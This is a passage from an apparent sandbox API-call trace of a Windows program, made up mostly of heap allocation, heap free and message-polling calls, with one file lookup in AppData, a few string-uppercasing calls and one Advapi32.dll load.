wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0199.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0199.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0199.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0199.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0199.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0199.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0199.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0199.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0199.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0199.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0199.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.926] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0199.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.927] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0199.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0199.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0199.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0199.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0199.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.928] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/jfoRUvp.mkv", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x745540d0, ftCreationTime.dwHighDateTime=0x1d4cfed, ftLastAccessTime.dwLowDateTime=0x8e37ef60, ftLastAccessTime.dwHighDateTime=0x1d4cd82, ftLastWriteTime.dwLowDateTime=0x8e37ef60, ftLastWriteTime.dwHighDateTime=0x1d4cd82, nFileSizeHigh=0x0, nFileSizeLow=0x38ea, dwReserved0=0xa8e0039, dwReserved1=0x1675a, cFileName="jfoRUvp.mkv", cAlternateFileName="")) returned 0xaa5860 [0199.929] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0199.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.929] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0199.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0199.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0199.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.931] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0199.931] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.931] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.931] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.932] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.932] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.932] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.932] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.932] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.933] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.933] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.934] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.934] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0199.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.935] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.935] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.935] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0199.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.935] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.935] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0199.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0199.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.936] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.936] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: 